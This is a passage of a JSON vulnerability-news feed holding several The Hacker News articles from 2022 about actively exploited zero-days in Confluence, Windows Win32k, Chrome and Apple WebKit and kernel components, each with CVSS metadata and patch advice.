arbitrary files to a remote server.\n\nThe development comes less than a year after another critical remote code execution flaw in Atlassian Confluence ([CVE-2021-26084](<https://thehackernews.com/2021/09/us-cyber-command-warns-of-ongoing.html>), CVSS score: 9.8) was actively weaponized in the wild to install cryptocurrency miners on compromised servers.\n\n\"By exploiting this kind of vulnerability, attackers can gain direct access to highly sensitive systems and networks,\" Volexity said. \"Further, these systems can often be difficult to investigate, as they lack the appropriate monitoring or logging capabilities.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-03T03:43:00", "type": "thn", "title": "Hackers Exploiting Unpatched Critical Atlassian Confluence Zero-Day Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084", "CVE-2022-26134"], "modified": "2022-06-03T09:27:09", "id": "THN:573D61ED9CCFF01AECC281F8913E42F8", "href": "https://thehackernews.com/2022/06/hackers-exploiting-unpatched-critical.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:37:35", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEhOB2VqcpzvIvbqWJmlBkCMLbnUxk3Z5xT2z3m3Gq-YuuBlN_NqdLRsokokD3U-FEY86UgsPht9jJl64elkaTldrF5sP92LWMSa6SiRtCYAh531p1yOcpxfIcK7KxbUiT4AcuUBJjXXV-KoHFwXcRxhZiXlPt_nDcSDmlAdw1IQJzBJ_AKFxIs-zvlV>)\n\nThe U.S. Cybersecurity and Infrastructure Security Agency (CISA) is urging federal agencies to secure their systems against an actively exploited security vulnerability in Windows that could be abused to gain elevated permissions on affected hosts.\n\nTo that end, the agency has added [CVE-2022-21882](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-21882>) (CVSS score: 7.0) to the [Known Exploited Vulnerabilities Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>), necessitating that Federal Civilian Executive Branch (FCEB) agencies patch all systems against this vulnerability by February 18, 2022.\n\n\"These types of vulnerabilities are a frequent attack vector for malicious cyber actors of all types and pose significant risk to the federal enterprise,\" CISA [said](<https://www.cisa.gov/uscert/ncas/current-activity/2022/02/04/cisa-adds-one-known-exploited-vulnerability-catalog>) in an advisory published last week.\n\n[](<https://thehackernews.com/new-images/img/a/AVvXsEi_i5GcfQrAT38f9axbzmFO-Sp4pa-68-q21bq9ALE0pr3rtd7YlA1XdpzF_M0ipJE_4ckPGcdP2bX7xhUeQIbU_JpRuDg5QbRJrTDOpgnI3EmoXugjloJtH_JOaWEeDDLiPE54NUuVokjdewdmpU6RxL1iBbRgZKIod0B73dVQnznjvTQNCy2MQ0sf>)\n\n[CVE-2022-21882](<https://github.com/L4ys/CVE-2022-21882>), which has been tagged with an \"Exploitation More Likely\" exploitability index assessment, concerns a case of elevation of privilege vulnerability affecting the Win32k component. The bug was addressed by Microsoft as part of its January 2022 [Patch Tuesday](<https://thehackernews.com/2022/01/first-patch-tuesday-of-2022-brings-fix.html>) updates.\n\n\"A local, authenticated attacker could gain elevated local system or administrator privileges through a vulnerability in the Win32k.sys driver,\" the Windows maker said. The flaw impacts Windows 10, Windows 11, Windows Server 2019, and Windows server 2022.\n\nIt's worth noting that the [security vulnerability](<https://googleprojectzero.github.io/0days-in-the-wild/0day-RCAs/2022/CVE-2022-21882.html>) is also a [bypass](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2021/CVE-2021-1732.html>) for another escalation of privilege flaw in the same module ([CVE-2021-1732](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1732>), CVSS score: 7.8) that Microsoft resolved in [February 2021](<https://thehackernews.com/2021/02/microsoft-issues-patches-for-in-wild-0.html>) and has since been detected in [exploits in the wild](<https://www.cisa.gov/uscert/ncas/current-activity/2021/02/09/microsoft-warns-windows-win32k-privilege-escalation>).\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-07T05:03:00", "type": "thn", "title": "CISA Orders Federal Agencies to Patch Actively Exploited Windows Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1732", "CVE-2022-21882"], "modified": "2022-02-07T05:03:44", "id": "THN:012EBB2FE2687F178FBCC3AB8ABEF778", "href": "https://thehackernews.com/2022/02/cisa-orders-federal-agencies-to-patch.html", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:37:34", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEjWiyPjnO359TQw-ASi6DIPZwvn9wVYFPNKS3PisnT8ANUMYz00ayq07GNT9j1BFhyIS-D-jW986AambKLx09TTpm1sTyhHBIwq5WnnLL6xLWbYO1lXdLaECt48nhwVzddm8IqWxgudeEmeXUPQEYzzGysp58wveGqZNvgqyliX2YcqPhBbbb8vV41h>)\n\nApple on Thursday released security updates for [iOS, iPadOS](<https://support.apple.com/en-us/HT213093>), [macOS](<https://support.apple.com/en-us/HT213092>), and [Safari](<https://support.apple.com/en-us/HT213091>) to address a new WebKit flaw that it said may have been actively exploited in the wild, making it the company's third zero-day patch since the start of the year.\n\nTracked as CVE-2022-22620, the issue concerns a use-after-free vulnerability in the WebKit component that powers the Safari web browser and could be exploited by a piece of specially crafted web content to gain arbitrary code execution. \n\n\"Apple is aware of a report that this issue may have been actively exploited,\" the company said in a terse statement acknowledging in-the-wild attacks leveraging the flaw.\n\nThe iPhone maker credited an anonymous researcher for discovering and reporting the flaw, adding it remediated the issue with improved memory management.\n\nThe updates are available for iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation), macOS devices running Big Sur and macOS Catalina, and also as a standalone update for Safari.\n\nThe latest fix brings the tally of zero-day patches issued by Apple for 2022 to three, including [CVE-2022-22587 and CVE-2022-22594](<https://thehackernews.com/2022/01/apple-releases-ios-and-ipados-updates.html>), that could have been exploited to run arbitrary code and track users' online activity in the web browser.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-11T03:30:00", "type": "thn", "title": "Apple Releases iOS, iPadOS, macOS Updates to Patch Actively Exploited Zero-Day Flaw", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22587", "CVE-2022-22594", "CVE-2022-22620"], "modified": "2022-02-11T03:30:50", "id": "THN:BD5ADDFE4C645A1619B0A94487CE63DF", "href": "https://thehackernews.com/2022/02/apple-releases-ios-ipados-macos-updates.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:39:28", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhpjCuGD4WXaNN6nxKO5EalNHXrEO1r2PgkwQYS5Z4fg1J1iNhNuSZu4tqOM6Ohl9vpp6QyHLYCS9rWACrVbbaIJUPQ9rTXrZPXmPG7SMzGybYouS2Gy54kBSr90hQqQD0npkDgUM7qiCLvQEpG86SHqny5-bN6yTHLRxPBtls52iaOhN5Ui-sM9RZ4/s728-e100/chrome-extensions.jpg>)\n\nGoogle on Thursday shipped emergency patches to address two security issues in its Chrome web browser, one of which it says is being actively exploited in the wild.\n\nTracked as [CVE-2022-1364](<https://chromereleases.googleblog.com/2022/04/stable-channel-update-for-desktop_14.html>), the tech giant described the high-severity bug as a case of type confusion in the V8 JavaScript engine. Cl\u00e9ment Lecigne of Google's Threat Analysis Group has been credited with reporting the flaw on April 13, 2022.\n\nAs is typically the case with actively exploited zero-day flaws, the company acknowledged it's \"aware that an exploit for CVE-2022-1364 exists in the wild.\" Additional details about the flaw and the identity of the threat actors have been withheld to prevent further abuse.\n\nWith the latest fix, Google has patched a total of three zero-day vulnerabilities in Chrome since the start of the year. It's also the second type confusion-related bug in V8 to be squashed in less than a month -\n\n * [CVE-2022-0609](<https://thehackernews.com/2022/02/new-chrome-0-day-bug-under-active.html>) \\- Use-after-free in Animation\n * [CVE-2022-1096](<https://thehackernews.com/2022/03/google-issues-urgent-chrome-update-to.html>) \\- Type confusion in V8\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEh6B83ZXigpC9fguwiLwmsTF6j73zc5NEtpSNiGfAAl-clSHcXVa31RbaQfOCfKesHRCqidahWfYEq_lTb6Wo-qPTz15of2-8gP75by67zdsyHfHawMXYaPWSZQLF1KIVi7jyn0uf4bWxBN0j73AHcGrmJOkXRdboYNb6jCKG2veHy3dPK8riejHmuo/s728-e100/chrome-update.jpg>)\n\nUsers are recommended to update to version 100.0.4896.127 for Windows, macOS, and Linux to thwart potential threats. Users of Chromium-based browsers such as Microsoft Edge, Brave, Opera, and Vivaldi are also advised to apply the fixes as and when they become available.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-04-15T03:25:00", "type": "thn", "title": "Google Releases Urgent Chrome Update to Patch Actively Exploited Zero-Day Flaw", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-0609", "CVE-2022-1096", "CVE-2022-1364"], "modified": "2022-04-18T03:04:38", "id": "THN:E48AEFF468AB8445D91A32B6F5D7A770", "href": "https://thehackernews.com/2022/04/google-releases-urgent-chrome-update-to.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-21T07:57:18", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEiYhs0ipenD0AoL9V_aDGu9Ne59wQB4dVjm765OFf3mrjKTBnTs1wKWI7wEhojmYN1I7kb8uwSBREekjYU8iT0Vwm5Hyt1OKmgy_fleoHryLao0e7ASyt3c-RFQZr0hQPO7IMPscn9-BZbr_-cYqs7nuTB5CSFjV0CmokCbPxE6hFiOt5lshyEgS6bP/s728-e100/Google%20Researchers%20Detail%205-Year-Old%20Apple%20Safari%20Vulnerability%20Exploited%20in%20the%20Wild.jpg>)\n\nA security flaw in Apple Safari that was exploited in the wild earlier this year was originally fixed in 2013 and reintroduced in December 2016, according to a new report from Google Project Zero.\n\nThe issue, tracked as [CVE-2022-22620](<https://thehackernews.com/2022/02/apple-releases-ios-ipados-macos-updates.html>) (CVSS score: 8.8), concerns a case of a use-after-free vulnerability in the WebKit component that could be exploited by a piece of specially crafted web content to gain arbitrary code execution.\n\nIn early February 2022, Apple shipped patches for the bug across Safari, iOS, iPadOS, and macOS, while acknowledging that it \"may have been actively exploited.\"\n\n\"In this case, the variant was completely patched when the vulnerability was initially reported in 2013,\" Maddie Stone of Google Project Zero [said](<https://googleprojectzero.blogspot.com/2022/06/an-autopsy-on-zombie-in-wild-0-day.html>). \"However, the variant was reintroduced three years later during large refactoring efforts. The vulnerability then continued to exist for 5 years until it was fixed as an in-the-wild zero-day in January 2022.\"\n\nWhile both the [2013](<https://github.com/WebKit/WebKit/commit/4b3be1d3a8d22cb2b2f5ddb8299f7cd25a21cebf>) and [2022](<https://github.com/WebKit/WebKit/commit/aa31b6b4d09b09acdf1cec11f2f7f35bd362dd0e>) bugs in the [History API](<https://googleprojectzero.github.io/0days-in-the-wild//0day-RCAs/2022/CVE-2022-22620.html>) are essentially the same, the paths to trigger the vulnerability are different. Then subsequent code changes undertaken years later revived the zero-day flaw from the dead like a \"zombie.\"\n\nStating the incident is not unique to Safari, Stone further stressed taking adequate time to audit code and patches to avoid instances of having to duplicate the fixes and understand the security impacts of the changes being carried out.\n\n\"Both the October 2016 and the December 2016 commits were very large. The commit in October changed 40 files with 900 additions and 1225 deletions. The commit in December changed 95 files with 1336 additions and 1325 deletions,\" Stone noted.\n\n\"It seems untenable for any developers or reviewers to understand the security implications of each change in those commits in detail, especially since they're related to lifetime semantics.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-20T10:10:00", "type": "thn", "title": "Google Researchers Detail 5-Year-Old Apple Safari Vulnerability Exploited in the Wild", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22620"], "modified": "2022-06-21T06:18:58", "id": "THN:9A9EADE3A5D4449C9E0519E22A93B306", "href": "https://thehackernews.com/2022/06/google-researchers-detail-5-year-old.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:37:24", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhEqKxDFmqhm8NEDiewGhtNosTQBetNOal6t8n-4FoDdS8Kohm2E_VIZmFt-TPGCUJfQqQR3I7FPUW16SUdjUlffpqOIkMXuwO85Pl8ENa14N6-OhtYk5Ft_5V-I0aQwBj6iNfvx3_Z5DnTUwfcvtSl6p_28rahMQ1dk0sc12TyBQhB-9vuz8heo2me/s728-e100/apple.jpg>)\n\nApple on Thursday rolled out emergency patches to address two zero-day flaws in its [mobile](<https://support.apple.com/en-us/HT213219>) and [desktop operating systems](<https://support.apple.com/en-us/HT213220>) that it said may have been exploited in the wild.\n\nThe shortcomings have been fixed as part of updates to iOS and iPadOS 15.4.1, macOS Monterey 12.3.1, tvOS 15.4.1, and watchOS 8.5.1. Both the vulnerabilities have been reported to Apple anonymously.\n\nTracked as **CVE-2022-22675**, the issue has been described as an [out-of-bounds write](<https://cwe.mitre.org/data/definitions/787.html>) vulnerability in an audio and video decoding component called AppleAVD that could allow an application to execute arbitrary code with kernel privileges.\n\nApple said the defect was resolved with improved bounds checking, adding it's aware that \"this issue may have been actively exploited.\"\n\nThe latest version of macOS Monterey, besides fixing CVE-2022-22675, also includes remediation for **CVE-2022-22674**, an [out-of-bounds read](<https://cwe.mitre.org/data/definitions/125.html>) issue in the Intel Graphics Driver module that could enable a malicious actor to read kernel memory.\n\nThe bug was \"addressed with improved input validation,\" the iPhone maker noted, once again stating there's evidence of active exploitation, while withholding additional details to prevent further abuse.\n\nThe latest updates bring the total number of actively exploited zero-days patched by Apple to four since the start of year, not to mention a publicly disclosed flaw in the [IndexedDB API](<https://thehackernews.com/2022/01/new-unpatched-apple-safari-browser-bug.html>) (CVE-2022-22594), which could be weaponized by a malicious website to track users' online activity and identities in the web browser.\n\n * [**CVE-2022-22587**](<https://thehackernews.com/2022/01/apple-releases-ios-and-ipados-updates.html>) (IOMobileFrameBuffer) \u2013 A malicious application may be able to execute arbitrary code with kernel privileges\n * [**CVE-2022-22620**](<https://thehackernews.com/2022/02/apple-releases-ios-ipados-macos-updates.html>) (WebKit) \u2013 Processing maliciously crafted web content may lead to arbitrary code execution\n\nIn light of active exploitation of the flaws, Apple iPhone, iPad, and Mac users are highly recommended to upgrade to the latest versions of the software as soon as possible to mitigate potential threats.\n\nThe iOS and iPad updates are available to iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation).\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-01T02:43:00", "type": "thn", "title": "Apple Issues Patches for 2 Actively Exploited Zero-Days in iPhone, iPad and Mac Devices", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22587", "CVE-2022-22594", "CVE-2022-22620", "CVE-2022-22674", "CVE-2022-22675"], "modified": "2022-04-01T02:54:05", "id": "THN:B7C3E2FB36F3AC7424BD3AE9F877CF3C", "href": "https://thehackernews.com/2022/03/apple-issues-patches-for-2-actively.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-07-05T16:25:13", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjPIpWOjahlvRij54ICh2NyDdEkKI9koTk4lx8UXqPG1hBOVokLO1jZE7QvnnAHX4fw21sdwK34cVKndChvGxTI0QScuSjwYGvpLSpuK9FSFbuXtXzoaxwm6I78OZwM-uyBKf7_r18ShybiBxFrmBcIKJ7pAD2BPSMaEVwJzpBkK1kNSbrrtJ6AmkPk/s728-e100/chrome-update.jpg>)\n\nGoogle on Monday shipped security updates to address a high-severity zero-day vulnerability in its Chrome web browser that it said is being exploited in the wild.\n\nThe shortcoming, tracked as [**CVE-2022-2294**](<https://chromereleases.googleblog.com/2022/07/stable-channel-update-for-desktop.html>), relates to a heap overflow flaw in the [WebRTC](<https://en.wikipedia.org/wiki/WebRTC>) component that provides real-time audio and video communication capabilities in browsers without the need to install plugins or download native apps.\n\nHeap buffer overflows, also referred to as heap overrun or heap smashing, occur when data is overwritten in the [heap area of the memory](<https://en.wikipedia.org/wiki/Memory_management#Manual_memory_management>), leading to arbitrary code execution or a denial-of-service (DoS) condition.\n\n\"Heap-based overflows can be used to overwrite function pointers that may be living in memory, pointing it to the attacker's code,\" MITRE [explains](<https://cwe.mitre.org/data/definitions/122.html>). \"When the consequence is arbitrary code execution, this can often be used to subvert any other security service.\"\n\nCredited with reporting the flaw on July 1, 2022, is Jan Vojtesek from the Avast Threat Intelligence team. It's worth pointing out that the bug also [impacts](<https://chromereleases.googleblog.com/2022/07/chrome-for-android-update.html>) the Android version of Chrome.\n\nAs is usually the case with zero-day exploitation, details pertaining to the flaw as well as other specifics related to the campaign have been withheld to prevent further abuse in the wild and until a significant chunk of users are updated with a fix.\n\nCVE-2022-2294 also marks the resolution of the fourth zero-day vulnerability in Chrome since the start of the year -\n\n * [**CVE-2022-0609**](<https://thehackernews.com/2022/02/new-chrome-0-day-bug-under-active.html>) \\- Use-after-free in Animation\n * [**CVE-2022-1096**](<https://thehackernews.com/2022/03/google-issues-urgent-chrome-update-to.html>) \\- Type confusion in V8\n * [**CVE-2022-1364**](<https://thehackernews.com/2022/04/google-releases-urgent-chrome-update-to.html>) \\- Type confusion in V8\n\nUsers are recommended to update to version 103.0.5060.114 for Windows, macOS, and Linux and 103.0.5060.71 for Android to mitigate potential threats. Users of Chromium-based browsers such as Microsoft Edge, Brave, Opera, and Vivaldi are also advised to apply the fixes as and when they become available.\n\nThe disclosure shortly follows a report from Google Project Zero, which [noted](<https://googleprojectzero.blogspot.com/2022/06/2022-0-day-in-wild-exploitationso-far.html>) that a total of 18 security vulnerabilities have been exploited as unpatched zero-days in the wild so far this year.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-07-05T02:55:00", "type": "thn", "title": "Update Google Chrome Browser to Patch New Zero-Day Exploit Detected in the Wild", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-0609", "CVE-2022-1096", "CVE-2022-1364", "CVE-2022-2294"], "modified": "2022-07-05T13:54:52", "id": "THN:2E90A09BA23747C57B4B5C9ED7D13ED9", "href": "https://thehackernews.com/2022/07/update-google-chrome-browser-to-patch.html", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-10-25T04:06:05", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEhCWMbXjpEIYZVQ_1kcBejV2yvIUEVDZUmbtChK5kDR3yOQHgw7xzF_5fMXJO8OtB4JREMoYl1LUKH-FA9op00z4Fg_lHIkRoez3GmCtRczFALlUcCc1cZ9hxyX-5KgGtx6lkx78rKcTbgSh12yw68XHad2FmQ5kR6NXRfjeQRjz_jcr5-Fyy43RNGy/s728/hacking-malware-ads.jpg>)\n\nApple on Wednesday released security updates for [iOS, iPadOS](<https://support.apple.com/en-us/HT213412>), and [macOS](<https://support.apple.com/en-us/HT213413>) platforms to remediate two zero-day vulnerabilities previously exploited by threat actors to compromise its devices.\n\nThe list of issues is below -\n\n * **CVE-2022-32893** \\- An out-of-bounds write issue in WebKit which could lead to the execution of arbitrary code by processing a specially crafted web content\n * **CVE-2022-32894** \\- An out-of-bounds write issue in the operating system's Kernel that could be abused by a malicious application to execute arbitrary code with the highest privileges\n\nApple said it addressed both the issues with improved bounds checking, adding it's aware the vulnerabilities \"may have been actively exploited.\"\n\nThe company did not disclose any additional information regarding these attacks or the identities of the threat actors perpetrating them, although it's likely that they were abused as part of highly-targeted intrusions.\n\nThe latest update brings the total number of actively exploited zero-days patched by Apple to six since the start of the year -\n\n * [**CVE-2022-22587**](<https://thehackernews.com/2022/01/apple-releases-ios-and-ipados-updates.html>) (IOMobileFrameBuffer) \u2013 A malicious application may be able to execute arbitrary code with kernel privileges\n * [**CVE-2022-22620**](<https://thehackernews.com/2022/02/apple-releases-ios-ipados-macos-updates.html>) (WebKit) \u2013 Processing maliciously crafted web content may lead to arbitrary code execution\n * [**CVE-2022-22674**](<https://thehackernews.com/2022/03/apple-issues-patches-for-2-actively.html>) (Intel Graphics Driver) \u2013 An application may be able to read kernel memory\n * [**CVE-2022-22675**](<https://thehackernews.com/2022/03/apple-issues-patches-for-2-actively.html>) (AppleAVD) \u2013 An application may be able to execute arbitrary code with kernel privileges\n\nBoth the vulnerabilities have been fixed in iOS 15.6.1, iPadOS 15.6.1, and macOS Monterey 12.5.1. The iOS and iPadOS updates are available for iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation).\n\n**_Update:_** Apple on Thursday released a [security update](<https://support.apple.com/en-us/HT213414>) for Safari web browser (version 15.6.1) for macOS Big Sur and Catalina to patch the WebKit vulnerability fixed in macOS Monterey.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": 